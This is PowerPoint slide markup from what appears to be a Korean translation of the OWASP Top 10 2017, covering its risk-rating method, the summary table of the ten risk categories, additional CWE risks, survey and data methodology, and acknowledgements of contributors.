                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" baseline="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위협원의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발생 가능성이 고려되지 않았다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여러분 조직의 특정 애플리케이션과 관련된 다양한 기술적 세부사항의 어떤 것도 고려되지 않았다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이런 요소들 중 어떤 것은 공격자가 특정 취약점을 발견하고 공격할 전반적인 발생 가능성에 중대하게 영향을 줄 수 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평가방식은 실제 사업에 미치는 영향을 고려하지 않습니다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조직의 문화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산업 및 규제 환경하에 여러분의 조직에서 사용하는 애플리케이션과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API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보안 위험을 어느 정도 수용할 수 있을 것인가는 그 조직에서 결정해야 할 것입니다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OWASP Top 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목적은 여러분을 위해 위험 분석을 하는 것이 아닙니다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다음은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A6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위험에 대한 계산을 설명하고 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(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A6:2017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잘못된 보안 구성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endParaRPr lang="en-US" sz="95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29378"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="5472100"/>
          <a:ext cx="6629400" cy="2783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81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애플리케이션 특징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공격 가능성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확산 정도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탐지 가능성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기술 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비즈니스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805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0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800" b="1" kern="0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</a:br>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="1" kern="0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평균</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B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= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0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3.0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rgbClr val="00000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744035" y="7857364"/>
            <a:ext cx="1028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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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+R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위험에 대한 참고 사항</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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94148" y="5607115"/>
            <a:ext cx="5932277" cy="390006"/>
            <a:chOff x="-64877" y="1058047"/>
            <a:chExt cx="5932277" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-64877" y="1058047"/>
              <a:ext cx="5932277" cy="386519"/>
              <a:chOff x="-64877" y="1070390"/>
              <a:chExt cx="5932277" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5257800" y="1070390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영향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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105372"/>
                <a:ext cx="139699" cy="305288"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr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5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6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37" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-64877" y="1073624"/>
                <a:ext cx="646331" cy="1972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위협요소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38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="118959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공격방법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39" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto"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보안 취약점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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2027790" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2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41" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="38" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="732390" y="1256471"/>
                <a:ext cx="457200" cy="1083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32" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto"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33" name="Rectangle 16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4" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="1357955" cy="72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2" name="Right Brace 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2738468" y="6140127"/>
            <a:ext cx="292533" cy="2241840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216588" y="6934761"/>
            <a:ext cx="270030" cy="1665187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51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75313"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="128683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위험 요소 요약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아래의 테이블은 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2017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상위 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개의 애플리케이션 위험의 요약과 각각의 위험들에 할당한 위험 요소입니다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이러한 요소들은 유효한 통계 값과 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OWASP TOP 10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팀의 경험을 기반으로 하여 결정되었습니다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특별한 애플리케이션이나 조직에 대한 이러한 위험들을 이해하기 위해서는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" u="sng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반드시 회사에 맞는 위협원과 사업적 영향을 고려해야 합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" u="sng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심지어 최악의 소프트웨어 결함도 만약 필요한 공격을 수행하는 포지션에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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위협원이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없거나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자산에 대한 사업적 영향이 무시할 정도라면 심각한 위험이 되지 않을 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2209800"/>
          <a:ext cx="6842248" cy="422337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21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84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위험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Exo 2" panose="00000500000000000000" pitchFamily="2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5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점수</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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인젝션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일반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baseline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8.0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인증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일반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</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="12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민감</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="90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정보 노출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5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A4:2017-XXE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일반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접근 제어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일반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200" b="1" i="0" u="none" strike="noStrike" kern="1200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>
                          <a:solidFill>
                            <a:schemeClr val="dk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  <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk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0579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="287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보안 설정 오류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5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중간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A7:2017- XSS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5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중간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A8:2017-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안전하지 않은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역직렬화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어려움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  <a:sym typeface="Wingding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일반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5.0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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="90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취약한 컴포넌트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5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중간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4.7</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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95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A10:2017-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불충분한 </a:t>
                      </a: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로깅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및 모니터링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앱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평균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50" b="1" i="0" u="none" strike="noStrike" kern="1200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1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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어려움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  <a:sym typeface="Wingding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중간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Liberation Sans" panose="020B0604020202020204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ko-KR" altLang="en-US" sz="80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특정 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" b="1" kern="12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앱</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1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50" b="1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23821"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553201"/>
          <a:ext cx="6858000" cy="25936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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>추가적인 위험 요소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Exo 2" panose="00000500000000000000" pitchFamily="2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은 기본적인 많은 것들을 포함하고 있지만 반드시 고려해야 하고 조직에서 평가해야 하는 다른 위험들도 많이 있습니다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이러한 것들 중 몇몇은 항상 확인되어지고 있는 새로운 공격기법들도 포함해서 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의 전 버전에서 다루었을 수도 있고 아닌 것들도 있습니다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추가로 고려해야 하는 중요한 애플리케이션 보안 위험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(CWE-ID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로 설정됨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에는 다음이 포함됩니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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100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CWE-352: Cross-Site Request Forgery (CSRF)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CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="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AppDoS</a:t>
                      </a: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')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CWE-434: Unrestricted Upload of File with Dangerous Type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CWE-451: User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)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CWE-601: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="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Unvalidated</a:t>
                      </a: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 Forward and Redirects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CWE-799: Improper Control of Interaction Frequency (Anti-Automation)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CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)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5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CWE-918: Server-Side Request Forgery (SSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950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819400" y="2627763"/>
            <a:ext cx="9952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확산 정도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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7232" y="2627763"/>
            <a:ext cx="9033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탐지 가능성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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9009" y="2627763"/>
            <a:ext cx="9567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공격 가능성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2356" y="2627763"/>
            <a:ext cx="8699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기술</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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219200" y="2262187"/>
            <a:ext cx="4887049" cy="464494"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="519129"/>
          </a:xfrm>
        </p:grpSpPr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991920" y="1073877"/>
              <a:ext cx="102036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216000" rIns="36000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="9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보안 취약점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</p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="586848" y="1072154"/>
              <a:ext cx="139703" cy="304798"/>
              <a:chOff x="324" y="1497"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="372" y="1497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0" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1689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flipH="1">
                <a:off x="324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>
                <a:off x="468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>
                <a:off x="324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1" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1309048" y="107896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ko-KR" altLang="en-US" sz="9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공격방법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auto">
            <a:xfrm>
              <a:off x="5411940" y="1049627"/>
              <a:ext cx="623454" cy="428655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000" rIns="18000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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영향도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  <a:latin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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="829115" y="1262418"/>
              <a:ext cx="441766" cy="123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45" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="42" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4012288" y="1263955"/>
              <a:ext cx="1399652" cy="42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430949" y="1348251"/>
              <a:ext cx="572938" cy="2205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 err="1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위협원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  <a:latin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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="39" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2188570" y="1263652"/>
              <a:ext cx="803350" cy="72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37" name="AutoShape 117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3457584" y="2283884"/>
            <a:ext cx="192106" cy="340902"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47538"/>
              <a:gd name="adj2" fmla="val 51293"/>
              <a:gd name="adj3" fmla="val 57006"/>
              <a:gd name="adj4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sz="900" b="1" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="2627763"/>
            <a:ext cx="7187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비즈니스</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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+RF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 요인에 대한 세부 정보</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2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42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B246788-8483-43FD-BCB2-20B1833E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32585"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="798076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8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개요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28">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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OWAST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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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회의시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의욕적인 참여자와 커뮤니티 회원들은 정량적 데이터에 의해 일부 정의하고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정성적인 설문 조사에 의해 일부 정의된 우선 순서와 함께 최대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개의 미래 지향적인 취약점 그룹을 갖고 취약점에 대한 관점을 세우기로 결정했습니다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산업분야 설문 순위</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1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780">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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설문을 만들기 위해 “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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정점”을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지났다고 판단되거나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메일링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리스트에서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 RC1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피드백에서 언급된 취약점들을 모아 보았습니다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 취약점들을 순위로 매길 수 있는 설문으로 만들었고 응답자들에게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10 - 2017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포함되었으면 하는 상위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취약점을 요청했습니다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설문기간은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8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월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2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일부터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9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월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18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일까지 였습니다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총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516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명이 응답하였으며 취약점들의 순위를 매겼습니다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개인 정보 노출은 확실히 가장 높은 취약점이지만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기존의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A3:2017-</a:t>
                      </a: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민감한 데이터 노출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추가적인 강조가 있는 것처럼 아주 잘 일치합니다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암호기법 실패는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민감한 데이터 노출과 일치할 수 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FF00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안전하지 않은 데이터의 역직렬화는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위에 있으며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위험등급 이후에 </a:t>
                      </a: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A8:2017-</a:t>
                      </a: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안전하지 않은 역직렬화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로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추가되었습니다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 사용자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN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관리 키는 </a:t>
                      </a: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A5:2017-</a:t>
                      </a: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취약한 접근 통제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해당합니다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;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인증 취약성과 관련된 많은 데이터가 없기 때문에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설문에서 높은 순위에 있다는 것은 괜찮습니다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설문에서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위는 충분하지 않은 로그 기록 및 모니터링이며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리스트에 잘 어울린다고 믿습니다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</a:t>
                      </a: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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>불충분한 로깅 및 모니터링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있는 이유입니다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애플리케이션이 무엇이 공격인지 정의하고 적절한 로깅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경고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에스컬레이션 및 대응 방안을 생성할 수 있어야 하는 시점으로 이동했습니다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공공 데이터 요청</a:t>
                      </a:r>
                      <a:endParaRPr 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3525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3291073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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전형적으로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수집하고 분석된 데이터들은 자주 보게 되는 데이터들입니다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얼마나 많은 취약점이 있느냐는 테스트한 애플리케이션에서 찾는 것입니다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잘 알려진 것처럼 전통적으로 도구들은 찾은 모든 취약점들을 보고하고 사람들은 수많은 여러 사례를 통해 단일한 결과를 보고합니다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두 가지 스타일의 보고서를 비슷한 방식으로 취합하는 것은 매우 어렵습니다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년에 발생률은 주어진 데이터 집합에서 얼마나 많은 애플리케이션이 하나 이상의 특정 취약점 유형을 가지고 있는 지로 계산하였습니다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950" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF00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많은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기여자들은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가지 관점의 데이터를 제공했습니다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전자는 취약성에서 발견된 모든 사례를 세는 전통적인 빈도 유형이고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후자는 각 취약점이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(1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번 이상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발견된 애플리케이션의 수를 세는 것입니다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완벽하지는 않지만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이는 사람을 도와주는 도구와 도구 보조로서 사람의 데이터를 비교를 합리적으로 할 수 있도록 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원시 데이터와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분석 작업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8"/>
                        </a:rPr>
                        <a:t>GitHub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다운로드 받을 수 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Top 10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차후 버전의 추가적인 구조로 이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GitHub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확장하고자 합니다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endParaRPr lang="en-US" altLang="ko-KR" sz="95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r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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데이터 요청에 대해 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40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이상의 제출이 있었으며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대부분은 빈도에 중점을 둔 원시 데이터 요청에서 얻어진 것이기 때문에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114,000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애플리케이션을 다룬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23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기여자들의 데이터를 사용할 수 있었습니다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기여자를 가능한 식별할 수 있도록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 시간 블록을 사용했습니다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en-US" altLang="ko-KR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Veracode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에서의 매년 데이터 간의 몇 가지 반복되는 애플리케이션의 유사성을 알고 있더라도 대부분의 애플리케이션은 고유합니다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사용한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23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데이터 셋은 도구를 이용한 사람의 테스트로 확인되거나 인간이 보조하는 도구에서의 특별한 발생률을 제공하였습니다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100%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이상 발생한 데이터에서의 이상치들은 최대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100%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로 조정되었습니다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발생률을 계산하기 위해 각 취약성 유형을 포함하고 있다고 알려진 모든 애플리케이션의 비율을 계산하였습니다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발생률의 순위는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순위의 전반적인 위험도에서의 전파 계산을 위해 사용되었습니다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79698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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>+DAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj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방법론 및 데이터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRP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17151"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="495299" y="2972577"/>
          <a:ext cx="5867402" cy="1194378"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="33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순위</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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답변한</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="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1" i="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취약점</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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점수</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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개인 정보 노출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(＇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개인정보보호 위반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') [CWE-359]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748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암호기법 실패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[CWE-310/311/312/326/327]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584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신뢰할 수 없는 데이터의 역직렬화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[CWE-502]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514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관리 키를 사용하여 인증 무효화하기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(IDOR* &amp;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경로 가로지르기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 [CWE-639]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493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충분하지 않은 로그 기록 및 모니터링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[CWE-223 / CWE-778]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440</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"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237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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>+ACK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감사 인사</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1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9985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데이터 기여자에 대한 감사 인사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업데이트를 지원하기 위해 취약점 데이터를 제공한 많은 조직들에게 감사드립니다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dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US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361950" algn="l"/>
                          <a:tab pos="1885950" algn="l"/>
                          <a:tab pos="1971675" algn="l"/>
                          <a:tab pos="3409950" algn="l"/>
                          <a:tab pos="3495675" algn="l"/>
                          <a:tab pos="4933950" algn="l"/>
                          <a:tab pos="5019675" algn="l"/>
                        </a:tabLst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처음으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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모든 데이터가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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ko-KR" alt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발표에 기여했으며</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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기여자의 전체 목록이</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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공개되었습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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kern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개별 기여자들에 대한 감사 인사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4898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="416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GitHub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함께 기여한 많은 시간을 보낸 개별 기여자 분들께 감사드립니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none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그리고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트위터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그리고 기타 다른 수단들을 통해 피드백을 제공했던 모든 사람들에게 감사합니다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Dirk Wetter, Jim </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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Manico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Osama </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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Elnaggar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광범위한 도움을 주었다는 것을 언급하지 않을 것입니다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또한 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Chris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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Frohoff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Gabriel Lawrence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새로운 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>안전하지 않은 역직렬화</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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작성에 대한 귀중한 지원을 제공했습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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950" kern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172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6CA28A-C875-42F4-A969-9E4EBCDC2625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5202070"/>
            <a:ext cx="6858000" cy="3105345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="5" spcCol="274320" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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ak47gen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alonergan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ameft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anantshri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bandrzej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bchurchill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binarious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bkimminich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Boberski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borischen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Calico90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chrish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clerkendweller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D00gs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davewichers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drkknight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drwetter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dune73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ecbftw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einsweniger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ekobrin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eoftedal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frohoff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fzipi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gebl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Gilc83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gilzow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global4g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grnd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h3xstream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hiralph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HoLyVieR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ilatypov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irbishop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itscooper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ivanr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jeremylong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jhaddix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jmanico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joaomatosf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jrmithdobbs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jsteven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jvehent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katyanton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kerberosmansour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koto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m8urnett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mwcoates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neo00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nickthetait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ninedter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ossie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-git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PauloASilva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PeterMosmans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pontocom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psiinon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pwntester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raesene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riramar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ruroot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securestep9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securitybits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SPoint42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sreenathsasikumar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starbuck3000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stefanb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sumitagarwalusa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taprootsec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tghosth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TheJambo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thesp0nge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toddgrotenhuis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troymarshall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tsohlacol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vdbaan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yohgaki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>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans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A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1601670"/>
            <a:ext cx="6849278" cy="2655328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="4" spcCol="457200" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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ANCAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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Aspect Security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AsTech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Consulting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Atos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Branding Brand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Bugcrowd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BUGemot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CDAC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Checkmarx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Colegio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LaSalle Monteria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Company.com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ContextIS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Contrast Security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DDoS.com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Derek Weeks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Easybss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Edgescan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EVRY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EZI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Hamed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Hidden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I4 Consulting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iBLISS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Seguran̤a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&amp; </a:t>
            </a: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Intelig̻encia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ITsec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Security Services </a:t>
            </a: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bv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Khallagh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Linden Lab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M. </a:t>
            </a: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Limacher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IT </a:t>
            </a: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Dienstleistungen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Micro Focus Fortify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Minded Security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National Center for Cyber Security Technology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Network Test Labs Inc.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Osampa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Paladion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Networks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Purpletalk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Secure Network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Shape Security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SHCP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Softtek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Synopsis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TCS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Vantage Point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Veracode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Web.com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629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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>+ACK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감사 인사</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1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86139"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
